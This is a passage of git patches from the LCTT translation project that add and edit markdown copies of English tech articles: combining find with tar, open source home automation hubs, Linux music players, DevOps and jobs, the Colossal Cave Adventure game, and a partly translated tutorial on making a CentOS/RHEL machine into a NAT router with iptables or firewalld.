hierarchy as per given criteria. The tar command is an archiving utility for Linux and Unix-like system to create tarballs. +[![How to find and tar files on linux unix][1]][1] +Let us see how to combine tar command with find command to create a tarball in a single command line option. + +I would like to find all documents file *.doc and create a tarball of those files and store in /nfs/backups/docs/file.tar. Is it possible to find and tar files on a Linux or Unix-like system?The find command used to search for files in a directory hierarchy as per given criteria. The tar command is an archiving utility for Linux and Unix-like system to create tarballs.Let us see how to combine tar command with find command to create a tarball in a single command line option. + +## Find command + +The syntax is: +``` +find /path/to/search -name "file-to-search" -options +## find all Perl (*.pl) files ## +find $HOME -name "*.pl" -print +## find all *.doc files ## +find $HOME -name "*.doc" -print +## find all *.sh (shell scripts) and run ls -l command on it ## +find . -iname "*.sh" -exec ls -l {} + +``` +Sample outputs from the last command: +``` +-rw-r--r-- 1 vivek vivek 1169 Apr 4 2017 ./backups/ansible/cluster/nginx.build.sh +-rwxr-xr-x 1 vivek vivek 1500 Dec 6 14:36 ./bin/cloudflare.pure.url.sh +lrwxrwxrwx 1 vivek vivek 13 Dec 31 2013 ./bin/cmspostupload.sh -> postupload.sh +lrwxrwxrwx 1 vivek vivek 12 Dec 31 2013 ./bin/cmspreupload.sh -> preupload.sh +lrwxrwxrwx 1 vivek vivek 14 Dec 31 2013 ./bin/cmssuploadimage.sh -> uploadimage.sh +lrwxrwxrwx 1 vivek vivek 13 Dec 31 2013 ./bin/faqpostupload.sh -> postupload.sh +lrwxrwxrwx 1 vivek vivek 12 Dec 31 2013 ./bin/faqpreupload.sh -> preupload.sh +lrwxrwxrwx 1 vivek vivek 14 Dec 31 2013 ./bin/faquploadimage.sh -> uploadimage.sh +-rw-r--r-- 1 vivek vivek 778 Nov 6 14:44 ./bin/mirror.sh +-rwxr-xr-x 1 vivek vivek 136 Apr 25 2015 ./bin/nixcraft.com.301.sh +-rwxr-xr-x 1 vivek vivek 547 Jan 30 2017 ./bin/paypal.sh +-rwxr-xr-x 1 vivek vivek 531 Dec 31 2013 ./bin/postupload.sh +-rwxr-xr-x 1 vivek vivek 437 Dec 31 2013 ./bin/preupload.sh +-rwxr-xr-x 1 vivek vivek 1046 May 18 2017 ./bin/purge.all.cloudflare.domain.sh +lrwxrwxrwx 1 vivek vivek 13 Dec 31 2013 ./bin/tipspostupload.sh -> postupload.sh +lrwxrwxrwx 1 vivek vivek 12 Dec 31 2013 ./bin/tipspreupload.sh -> preupload.sh +lrwxrwxrwx 1 vivek vivek 14 Dec 31 2013 ./bin/tipsuploadimage.sh -> uploadimage.sh +-rwxr-xr-x 1 vivek vivek 1193 Oct 18 2013 ./bin/uploadimage.sh +-rwxr-xr-x 1 vivek vivek 29 Nov 6 14:33 ./.vim/plugged/neomake/tests/fixtures/errors.sh +-rwxr-xr-x 1 vivek vivek 215 Nov 6 14:33 ./.vim/plugged/neomake/tests/helpers/trap.sh +``` + +## Tar command + +To [create a tar ball of /home/vivek/projects directory][2], run: +``` +$ tar -cvf /home/vivek/projects.tar /home/vivek/projects +``` + +## Combining find and tar commands + +The syntax is: +``` +find /dir/to/search/ -name "*.doc" -exec tar -rvf out.tar {} \; +``` +OR +``` +find /dir/to/search/ -name "*.doc" -exec tar -rvf out.tar {} + +``` +For example: +``` +find $HOME -name "*.doc" -exec tar -rvf /tmp/all-doc-files.tar "{}" \; +``` +OR +``` +find $HOME -name "*.doc" -exec tar -rvf /tmp/all-doc-files.tar "{}" + +``` +Where, find command options: + + * **-name "*.doc"** : Find file as per given pattern/criteria. In this case find all *.doc files in $HOME. + * **-exec tar ...** : Execute tar command on all files found by the find command. + +Where, tar command options: + + * **-r** : Append files to the end of an archive. Arguments have the same meaning as for -c option. + * **-v** : Verbose output. + * **-f** : out.tar : Append all files to out.tar file. + + + +It is also possible to pipe output of the find command to the tar command as follows: +``` +find $HOME -name "*.doc" -print0 | tar -cvf /tmp/file.tar --null -T - +``` +The -print0 option passed to the find command deals with special file names. The -null and -T - option tells the tar command to read its input from stdin/pipe. It is also possible to use the xargs command: +``` +find $HOME -type f -name "*.sh" | xargs tar cfvz /nfs/x230/my-shell-scripts.tgz +``` +See the following man pages for more info: +``` +$ man tar +$ man find +$ man xargs +$ man bash +``` + + +-------------------------------------------------------------------------------- + +via: https://www.cyberciti.biz/faq/linux-unix-find-tar-files-into-tarball-command/ + +作者:[Vivek Gite][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.cyberciti.biz +[1]:https://www.cyberciti.biz/media/new/faq/2017/12/How-to-find-and-tar-files-on-linux-unix.jpg +[2]:https://www.cyberciti.biz/faq/creating-a-tar-file-linux-command-line/ From 967dcf08c586d6743c67ea01d23c217b6d764cbc Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 16 Dec 2017 11:13:21 +0800 Subject: [PATCH 0617/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=206=20open=20sour?= =?UTF-8?q?ce=20home=20automation=20tools?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...214 6 open source home automation tools.md | 116 ++++++++++++++++++ 1 file changed, 116 insertions(+) create mode 100644 sources/tech/20171214 6 open source home automation tools.md diff --git a/sources/tech/20171214 6 open source home automation tools.md b/sources/tech/20171214 6 open source home automation tools.md new file mode 100644 index 0000000000..24962b3e8d --- /dev/null +++ b/sources/tech/20171214 6 open source home automation tools.md @@ -0,0 +1,116 @@ +6 open source home automation tools +====== + +The [Internet of Things][13] isn't just a buzzword, it's a reality that's expanded rapidly since we last published a review article on home automation tools in 2016\. In 2017, [26.5% of U.S. households][14] already had some type of smart home technology in use; within five years that percentage is expected to double. + +With an ever-expanding number of devices available to help you automate, protect, and monitor your home, it has never been easier nor more tempting to try your hand at home automation. Whether you're looking to control your HVAC system remotely, integrate a home theater, protect your home from theft, fire, or other threats, reduce your energy usage, or just control a few lights, there are countless devices available at your disposal. + +But at the same time, many users worry about the security and privacy implications of bringing new devices into their homes—a very real and [serious consideration][15]. They want to control who has access to the vital systems that control their appliances and record every moment of their everyday lives. And understandably so: In an era when even your refrigerator may now be a smart device, don't you want to know if your fridge is phoning home? Wouldn't you want some basic assurance that, even if you give a device permission to communicate externally, it is only accessible to those who are explicitly authorized? + +[Security concerns][16] are among the many reasons why open source will be critical to our future with connected devices. Being able to fully understand the programs that control your home means you can view, and if necessary modify, the source code running on the devices themselves. + +While connected devices often contain proprietary components, a good first step in bringing open source into your home automation system is to ensure that the device that ties your devices together—and presents you with an interface to them (the "hub")—is open source. Fortunately, there are many choices out there, with options to run on everything from your always-on personal computer to a Raspberry Pi. + +Here are just a few of our favorites. + +### Calaos + +[Calaos][17] is designed as a full-stack home automation platform, including a server application, touchscreen interface, web application, native mobile applications for iOS and Android, and a preconfigured Linux operating system to run underneath. The Calaos project emerged from a French company, so its support forums are primarily in French, although most of the instructional material and documentation have been translated into English. + +Calaos is licensed under version 3 of the [GPL][18] and you can view its source on [GitHub][19]. + +### Domoticz + +[Domoticz][20] is a home automation system with a pretty wide library of supported devices, ranging from weather stations to smoke detectors to remote controls, and a large number of additional third-party [integrations][21] are documented on the project's website. It is designed with an HTML5 frontend, making it accessible from desktop browsers and most modern smartphones, and is lightweight, running on many low-power devices like the Raspberry Pi. + +Domoticz is written primarily in C/C++ under the [GPLv3][22], and its [source code][23] can be browsed on GitHub. + +### Home Assistant + +[Home Assistant][24] is an open source home automation platform designed to be easily deployed on almost any machine that can run Python 3, from a Raspberry Pi to a network-attached storage (NAS) device, and it even ships with a Docker container to make deploying on other systems a breeze. It integrates with a large number of open source as well as commercial offerings, allowing you to link, for example, IFTTT, weather information, or your Amazon Echo device, to control hardware from locks to lights. + +Home Assistant is released under an [MIT license][25], and its source can be downloaded from [GitHub][26]. + +### MisterHouse + +[MisterHouse][27] has gained a lot of ground since 2016, when we mentioned it as "another option to consider" on this list. It uses Perl scripts to monitor anything that can be queried by a computer or control anything capable of being remote controlled. It responds to voice commands, time of day, weather, location, and other events to turn on the lights, wake you up, record your favorite TV show, announce phone callers, warn that your front door is open, report how long your son has been online, tell you if your daughter's car is speeding, and much more. It runs on Linux, macOS, and Windows computers and can read/write from a wide variety of devices including security systems, weather stations, caller ID, routers, vehicle location systems, and more + +MisterHouse is licensed under the [GPLv2][28] and you can view its source code on [GitHub][29]. + +### OpenHAB + +[OpenHAB][30] (short for Open Home Automation Bus) is one of the best-known home automation tools among open source enthusiasts, with a large user community and quite a number of supported devices and integrations. Written in Java, openHAB is portable across most major operating systems and even runs nicely on the Raspberry Pi. Supporting hundreds of devices, openHAB is designed to be device-agnostic while making it easier for developers to add their own devices or plugins to the system. OpenHAB also ships iOS and Android apps for device control, as well as design tools so you can create your own UI for your home system. + +You can find openHAB's [source code][31] on GitHub licensed under the [Eclipse Public License][32]. + +### OpenMotics + +[OpenMotics][33] is a home automation system with both hardware and software under open source licenses. It's designed to provide a comprehensive system for controlling devices, rather than stitching together many devices from different providers. Unlike many of the other systems designed primarily for easy retrofitting, OpenMotics focuses on a hardwired solution. For more, see our [full article][34] from OpenMotics backend developer Frederick Ryckbosch. + +The source code for OpenMotics is licensed under the [GPLv2][35] and is available for download on [GitHub][36]. + +These aren't the only options available, of course. Many home automation enthusiasts go with a different solution, or even decide to roll their own. Other users choose to use individual smart home devices without integrating them into a single comprehensive system. + +If the solutions above don't meet your needs, here are some potential alternatives to consider: + +* [EventGhost][1] is an open source ([GPL v2][2]) home theater automation tool that operates only on Microsoft Windows PCs. It allows users to control media PCs and attached hardware by using plugins that trigger macros or by writing custom Python scripts. + +* [ioBroker][3] is a JavaScript-based IoT platform that can control lights, locks, thermostats, media, webcams, and more. It will run on any hardware that runs Node.js, including Windows, Linux, and macOS, and is open sourced under the [MIT license][4]. + +* [Jeedom][5] is a home automation platform comprised of open source software ([GPL v2][6]) to control lights, locks, media, and more. It includes a mobile app (Android and iOS) and operates on Linux PCs; the company also sells hubs that it says provide a ready-to-use solution for setting up home automation. + +* [LinuxMCE][7] bills itself as the "'digital glue' between your media and all of your electrical appliances." It runs on Linux (including Raspberry Pi), is released under the Pluto open source [license][8], and can be used for home security, telecom (VoIP and voice mail), A/V equipment, home automation, and—uniquely—to play video games. + +* [OpenNetHome][9], like the other solutions in this category, is open source software for controlling lights, alarms, appliances, etc. It's based on Java and Apache Maven, operates on Windows, macOS, and Linux—including Raspberry Pi, and is released under [GPLv3][10]. + +* [Smarthomatic][11] is an open source home automation framework that concentrates on hardware devices and software, rather than user interfaces. Licensed under [GPLv3][12], it's used for things such as controlling lights, appliances, and air humidity, measuring ambient temperature, and remembering to water your plants. + +Now it's your turn: Do you already have an open source home automation system in place? Or perhaps you're researching the options to create one. What advice would you have to a newcomer to home automation, and what system or systems would you recommend? + +-------------------------------------------------------------------------------- + +via: https://opensource.com/life/17/12/home-automation-tools + +作者:[Jason Baker][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/jason-baker +[1]:http://www.eventghost.net/ +[2]:http://www.gnu.org/licenses/old-licenses/gpl-2.0.html +[3]:http://iobroker.net/ +[4]:https://github.com/ioBroker/ioBroker#license +[5]:https://www.jeedom.com/site/en/index.html +[6]:http://www.gnu.org/licenses/old-licenses/gpl-2.0.html +[7]:http://www.linuxmce.com/ +[8]:http://wiki.linuxmce.org/index.php/License +[9]:http://opennethome.org/ +[10]:https://github.com/NetHome/NetHomeServer/blob/master/LICENSE +[11]:https://www.smarthomatic.org/ +[12]:https://github.com/breaker27/smarthomatic/blob/develop/GPL3.txt +[13]:https://opensource.com/resources/internet-of-things +[14]:https://www.statista.com/outlook/279/109/smart-home/united-states +[15]:http://www.crn.com/slide-shows/internet-of-things/300089496/black-hat-2017-9-iot-security-threats-to-watch.htm +[16]:https://opensource.com/business/15/5/why-open-source-means-stronger-security +[17]:https://calaos.fr/en/ +[18]:https://github.com/calaos/calaos-os/blob/master/LICENSE +[19]:https://github.com/calaos +[20]:https://domoticz.com/ +[21]:https://www.domoticz.com/wiki/Integrations_and_Protocols +[22]:https://github.com/domoticz/domoticz/blob/master/License.txt +[23]:https://github.com/domoticz/domoticz +[24]:https://home-assistant.io/ +[25]:https://github.com/home-assistant/home-assistant/blob/dev/LICENSE.md +[26]:https://github.com/balloob/home-assistant +[27]:http://misterhouse.sourceforge.net/ +[28]:http://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html +[29]:https://github.com/hollie/misterhouse +[30]:http://www.openhab.org/ +[31]:https://github.com/openhab/openhab +[32]:https://github.com/openhab/openhab/blob/master/LICENSE.TXT +[33]:https://www.openmotics.com/ +[34]:https://opensource.com/life/14/12/open-source-home-automation-system-opemmotics +[35]:http://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html +[36]:https://github.com/openmotics From 57479df65f9d9f1a00878c9d905c056fb3fac361 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 16 Dec 2017 12:39:21 +0800 Subject: [PATCH 0618/1627] =?UTF-8?q?=E8=A1=A5=E5=85=85=E9=85=8D=E5=9B=BE?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- sources/tech/20171214 6 open source home automation tools.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171214 6 open source home automation tools.md b/sources/tech/20171214 6 open source home automation tools.md index 24962b3e8d..ff8be5e0c5 100644 --- a/sources/tech/20171214 6 open source home automation tools.md +++ b/sources/tech/20171214 6 open source home automation tools.md @@ -1,6 +1,8 @@ 6 open source home automation tools ====== +![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/osdc_520x292_openlightbulbs.png?itok=nrv9hgnH) + The [Internet of Things][13] isn't just a buzzword, it's a reality that's expanded rapidly since we last published a review article on home automation tools in 2016\. In 2017, [26.5% of U.S. households][14] already had some type of smart home technology in use; within five years that percentage is expected to double. With an ever-expanding number of devices available to help you automate, protect, and monitor your home, it has never been easier nor more tempting to try your hand at home automation. Whether you're looking to control your HVAC system remotely, integrate a home theater, protect your home from theft, fire, or other threats, reduce your energy usage, or just control a few lights, there are countless devices available at your disposal. From 51b38e7fdd634d5d099a92e04ec11af90142c986 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 16 Dec 2017 12:43:42 +0800 Subject: [PATCH 0619/1627] =?UTF-8?q?=E4=BF=AE=E6=94=B9=E9=94=99=E8=AF=AF?= =?UTF-8?q?=EF=BC=8C=E8=A1=A5=E5=85=85=E4=BD=9C=E8=80=85=E7=AE=80=E4=BB=8B?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...5 How to find and tar files into a tar ball.md | 15 +++++++++++---- 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/sources/tech/20171215 How to find and tar files into a tar ball.md b/sources/tech/20171215 How to find and tar files into a tar ball.md index 8208943d4e..06973ba243 100644 --- a/sources/tech/20171215 How to find and tar files into a tar ball.md +++ b/sources/tech/20171215 How to find and tar files into a tar ball.md @@ -1,11 +1,13 @@ How to find and tar files into a tar ball ====== -The find command used to search for files in a directory hierarchy as per given criteria. The tar command is an archiving utility for Linux and Unix-like system to create tarballs. -[![How to find and tar files on linux unix][1]][1] -Let us see how to combine tar command with find command to create a tarball in a single command line option. +I would like to find all documents file *.doc and create a tarball of those files and store in /nfs/backups/docs/file.tar. Is it possible to find and tar files on a Linux or Unix-like system? -I would like to find all documents file *.doc and create a tarball of those files and store in /nfs/backups/docs/file.tar. Is it possible to find and tar files on a Linux or Unix-like system?The find command used to search for files in a directory hierarchy as per given criteria. The tar command is an archiving utility for Linux and Unix-like system to create tarballs.Let us see how to combine tar command with find command to create a tarball in a single command line option. +The find command used to search for files in a directory hierarchy as per given criteria. The tar command is an archiving utility for Linux and Unix-like system to create tarballs. + +[![How to find and tar files on linux unix][1]][1] + +Let us see how to combine tar command with find command to create a tarball in a single command line option. ## Find command @@ -97,6 +99,11 @@ $ man xargs $ man bash ``` +------------------------------ + +作者简介: + +The author is the creator of nixCraft and a seasoned sysadmin and a trainer for the Linux operating system/Unix shell scripting. He has worked with global clients and in various industries, including IT, education, defense and space research, and the nonprofit sector. Follow him on Twitter, Facebook, Google+. -------------------------------------------------------------------------------- From bc822b0ff9d8ac7a4c6908d8d781f4d85fe08b45 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 16 Dec 2017 12:46:17 +0800 Subject: [PATCH 0620/1627] =?UTF-8?q?=E5=8F=88=E6=8A=8A=E9=A2=98=E5=9B=BE?= =?UTF-8?q?=E5=90=83=E4=BA=86?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- sources/tech/20171215 Top 5 Linux Music Players.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/sources/tech/20171215 Top 5 Linux Music Players.md b/sources/tech/20171215 Top 5 Linux Music Players.md index cfd4d14f23..9c0bcaf38e 100644 --- a/sources/tech/20171215 Top 5 Linux Music Players.md +++ b/sources/tech/20171215 Top 5 Linux Music Players.md @@ -1,5 +1,10 @@ Top 5 Linux Music Players ====== + +![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/live-music.jpg?itok=Ejbo4rf7_ +>Jack Wallen rounds up his five favorite Linux music players. Creative Commons Zero +>Pixabay + No matter what you do, chances are you enjoy a bit of music playing in the background. Whether you're a coder, system administrator, or typical desktop user, enjoying good music might be at the top of your list of things you do on the desktop. And, with the holidays upon us, you might wind up with some gift cards that allow you to purchase some new music. If your music format of choice is of a digital nature (mine happens to be vinyl) and your platform is Linux, you're going to want a good GUI player to enjoy that music. Fortunately, Linux has no lack of digital music players. In fact, there are quite a few, most of which are open source and available for free. Let's take a look at a few such players, to see which one might suit your needs. From 4a6df1cff2d4cc4b182c9dc015c198481353197c Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 16 Dec 2017 12:48:14 +0800 Subject: [PATCH 0621/1627] =?UTF-8?q?=E6=8F=90=E5=9B=BE?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- sources/tech/20171213 Will DevOps steal my job-.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/sources/tech/20171213 Will DevOps steal my job-.md b/sources/tech/20171213 Will DevOps steal my job-.md index 32069508c4..72694ae69e 100644 --- a/sources/tech/20171213 Will DevOps steal my job-.md +++ b/sources/tech/20171213 Will DevOps steal my job-.md @@ -1,5 +1,11 @@ Will DevOps steal my job? ====== + +>Are you worried automation will replace people in the workplace? You may be right, but here's why that's not a bad thing. + +![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BIZ_question_B.png?itok=f88cyt00) +>Image by : opensource.com + It's a common fear: Will DevOps be the end of my job? After all, DevOps means developers doing operations, right? DevOps is automation. What if I automate myself out of a job? Do continuous delivery and containers mean operations staff are obsolete? DevOps is all about coding: infrastructure-as-code and testing-as-code and this-or-that-as-code. What if I don't have the skill set to be a part of this? [DevOps][1] is a looming change, disruptive in the field, with seemingly fanatical followers talking about changing the world with the [Three Ways][2]--the three underpinnings of DevOps--and the tearing down of walls. It can all be overwhelming. So what's it going to be--is DevOps going to steal my job? From 0a5567a49e8ff73a5d2d4be0883c90a0f1cd7066 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 16 Dec 2017 12:49:25 +0800 Subject: [PATCH 0622/1627] =?UTF-8?q?=E5=9B=BE?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit From 0a7da95a6bc7fda8a945a6433c5f05dfcf14c189 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 16 Dec 2017 12:57:27 +0800 Subject: [PATCH 0623/1627] =?UTF-8?q?=E5=9B=BE=E5=95=8A?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...t Famous Classic Text-based Adventure Game.md | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/sources/tech/20171214 The Most Famous Classic Text-based Adventure Game.md b/sources/tech/20171214 The Most Famous Classic Text-based Adventure Game.md index 07403cdba8..37b2999f07 100644 --- a/sources/tech/20171214 The Most Famous Classic Text-based Adventure Game.md +++ b/sources/tech/20171214 The Most Famous Classic Text-based Adventure Game.md @@ -2,6 +2,8 @@ The Most Famous Classic Text-based Adventure Game ====== **Colossal Cave Adventure** , also known as **ADVENT** , **Colossal Cave** , or **Adventure** , is a most popular text-based adventure game in the period of early 80s and late 90s. This game is also known to be historic first "interactive fiction" game. In 1976, a Programmer named **Will Crowther** wrote the early version of this game, and later a fellow programmer **Don Woods** improved the game with many features by adding scoring system, more fantasy characters and locations. This game is originally developed for **PDP-10** , a good-old giant Mainframe computer. Later, it was ported to normal home desktop computers like IBM PC and Commodore 64. The original game was written using Fortran, and later it was introduced in MS-DOS 1.0 in the early 1980s by Microsoft. +![](https://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-1.jpeg) + The **Adventure 2.5** final version released in 1995 has never been packaged for modern operating systems. It went nearly extinct. Thankfully, after several years the open source advocate **Eric Steven Raymond** has ported this classic game to modern operating systems with the permission from original authors. He open sourced this classic game and hosted the source code in GitLab with a new name **" open-adventure"**. The main objective of this game is to find a cave rumored to be filled with a lot of treasure and gold and get out of it alive. The player earns points as he moves around the imaginary cave. The total number of points is 430. This game is mainly inspired by the extensive knowledge of cave exploration of the original author **Will Crowther**. He had been actively exploring in caves, particularly Mammoth Cave in Kentucky. Since the game 's cave structured loosely around the Mammoth Cave, you may notice many similarities between the locations in the game and those in Mammoth Cave. @@ -71,17 +73,17 @@ advent You will see a welcome screen. Type "y" if you want instructions or type "n" to get into the adventurous trip. -[![][6]][7] +![][6] The game begins in-front of a small brick building. The player needs to direct the character with simple one or two word commands in simple English. To move your character, just type commands like **in** , **out** , **enter** , **exit** , **building** , **forest** , **east** , **west** , **north** , **south** , **up** , or **down**. You can also use one-word letters to specify the direction. Here are some one letters to direct the character to move: **N** , **S** , **E** , **W** , **NW** , **SE** , etc. For example, if you type **" south"** or simply **" s"** the character will go south side of the present location. Please note that the character will understand only the first five characters. So when you have to type some long words, such as **northeast** , just use NE (small or caps). To specify southeast use SE. To pick up an item, type **pick**. To exit from a place, type **exit**. To go inside the building or any place, type **in**. To exit from any place, type **exit** and so on. It also warns you if there are any danger along the way. Also you can interact with two-word commands like **" eat food"**, **" drink water"**, **" get lamp"**, **" light lamp"**, **" kill snake"** etc. You can display the help section at any time by simply typing "help". -[![][6]][8] +![][8] I spent my entire afternoon to see what is in this game. Oh dear, it was super fun, exciting, thrill and adventurous experience! -[![][6]][9] +![][9] I went into many levels and explored many locations along the way. I even got gold and was attacked by a snake and a dwarf once. I must admit that this game is really addictive and best time killer. @@ -107,7 +109,7 @@ via: https://www.ostechnix.com/colossal-cave-adventure-famous-classic-text-based [3]:https://www.ostechnix.com/install-packer-arch-linux-2/ [4]:https://www.ostechnix.com/install-yaourt-arch-linux/ [5]:https://play.google.com/store/apps/details?id=com.ecsoftwareconsulting.adventure430 -[6]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 -[7]:http://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-2.png () -[8]:http://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-3.png () -[9]:http://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-1.png () +[6]:https://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-2.png +[7]:http://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-2.png +[8]:http://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-3.png +[9]:http://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-1.png From 0b3f71518cb6c54e7746395f530153e9a364037e Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 16 Dec 2017 19:18:24 +0800 Subject: [PATCH 0624/1627] =?UTF-8?q?update=20at=202017=E5=B9=B4=2012?= =?UTF-8?q?=E6=9C=88=2016=E6=97=A5=20=E6=98=9F=E6=9C=9F=E5=85=AD=2019:18:2?= =?UTF-8?q?4=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...entOS-RHEL 6 or 7 machine into a router.md | 87 ------------------ ...entOS-RHEL 6 or 7 machine into a router.md | 91 +++++++++++++++++++ 2 files changed, 91 insertions(+), 87 deletions(-) delete mode 100644 sources/tech/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md create mode 100644 translated/tech/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md diff --git a/sources/tech/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md b/sources/tech/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md deleted file mode 100644 index ae2cd9e2b2..0000000000 --- a/sources/tech/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md +++ /dev/null @@ -1,87 +0,0 @@ -Translate by lujun9972 -Turning a CentOS/RHEL 6 or 7 machine into a router -====== -In this tutorial we are going to learn to convert RHEL/CentOS 6 & 7 machines into a router by using NATting. Router as we know is layer 3 networking device that is used to connect 2 or more networks i.e. either connecting LAN to WAN or LAN to LAN etc. Router devices are quite expensive & especially for small organizations, that might be a reason for concern. So rather than using a dedicated Hardware, we can use any Linux machine & convert it into a router. -We will be discussing process for both RHEL/CentOS 6 & 7\. But before we do that, let's discuss the things we will be needing for our setup. - -### Prerequisite - -**1-** A machine with either RHEL/CentOS 6 or 7 installed -**2-** Two NICs to assign local IP address & WAN IP address respectively - -We must assign IP address to both network interface cards, one IP should be for local area network (information regarding it will be provided by our Network administrator) & other IP should be to access internet, information for WAN IP will be provided by ISP. For example - - **Ifcfg-en0s3 192.168.1.1** (LAN IP address) -**Ifcfg-en0s5 10.1.1.1 ** (WAN IP address) - - **Note** - Change the interface name according to Linux distro being used. - -Now that we have what we need, we will move onto the setup - -### Step 1 Enabling IP forwarding - -Firstly we will enable IP forwarding on the machine. Process of doing same is same in both RHEL/CentOS 6 & 7\. To enable IP forwarding, run - -``` -$ sysctl -w net.ipv4.ip_forward=1 -``` - -But this will not persist on system reboot. To make it survive a system reboot, open - -``` -$ vi /etc/sysctl.conf -``` - -& enter the following to the file, - -``` -net.ipv4.ip_forward = 1 -``` - -Save file & exit. IP forwarding has now been enabled on the system. - -### Step 2 Configuring IPtables/Firewalld rules - -Next we need to start services of IPtables/firewalld on our systems to configure the NATting rule, - -``` -$ systemctl start firewalld (For Centos/RHEL 7) -$ service iptables start (For Centos/RHEL 6) -``` - -Next step is to configure the NATting rule on the firewall. Run the following command, - -``` -CentOS/RHEL 6 -$ iptables -t nat -A POSTROUTING -o XXXX -j MASQUERADE -$ service iptables restart CentOS/RHEL 7 -$ firewall-cmd -permanent -direct -passthrough ipv4 -t nat -I POSTROUTING -o XXXX -j MASQUERADE -s 192.168.1.0/24 -$ systemctl restart firewalld -``` - -Here, **XXXX** is the name of the network interface with the WAN IP address. This completes configuration of Linux machine as router, next we will test our router after configuring a client machine. - -### Step 3 Configuring the client machine - -To test the router, we need to assign the internal (LAN) IP address as gateway on our client machine, its 192.168.1.1 in our case. So whether using a Windows machine or linux machine as client, make sure that we have 192.168.1.1 as our gateway. Once that's done, open terminal/CMD run a ping test against a website to make sure that internet is accessible on client machine, - - **$ ping google.com -** - -We can also check by browsing websites via our web browser. - - --------------------------------------------------------------------------------- - -via: http://linuxtechlab.com/turning-centosrhel-6-7-machine-router/ - -作者:[][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://linuxtechlab.com -[1]:https://www.facebook.com/linuxtechlab/ -[2]:https://twitter.com/LinuxTechLab -[3]:https://plus.google.com/+linuxtechlab diff --git a/translated/tech/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md b/translated/tech/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md new file mode 100644 index 0000000000..97f04f1384 --- /dev/null +++ b/translated/tech/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md @@ -0,0 +1,91 @@ +将安装了 CentOS/RHEL 6/7 的机器转变成路由器 +====== +在本文中,我们将学习通过使用 NAT 技术将安装有 RHEL/CentOS 6 & 7 的及其转变成路由器来用。 我们都知道,路由器是一个工作在第三层的网络设备,用于将 2 个或多个网络连接在一起,即将局域网连接上广域网上或者局域网直接互联。 路由器非常昂贵,尤其对于小型组织来说更是如此,这可能是我们关注路由器的一个原因。 与其使用专用硬件,不如让我们用 Linux 机器转换成路由器来用。 + +RHEL/CentOS 6 和 7 上的操作过程我们都会讲。但在开始之前, 让我们先看看需要准备那些东西。 + +### 前期条件 + +1- 一台装有 RHEL/CentOS 6 或 7 的机器 + +2- 两块分别配有本地 IP 和外网 IP 的网卡 + +我们需要为两个网卡都分配 IP 地址,一个本地网络的 IP( 由我们的网络管理员提供),另一个是互联网 IP( 由 ISP 提供)。 像这样: + +``` +Ifcfg-en0s3 192.168.1.1 (LAN IP address) +Ifcfg-en0s5 10.1.1.1 (WAN IP address) +``` + +**注意** - 不同 Linux 发行版的网卡名是不一样的。 + +现在准备工作完成了,可以进行配置了。 + +### 步骤 1 启用 IP 转发 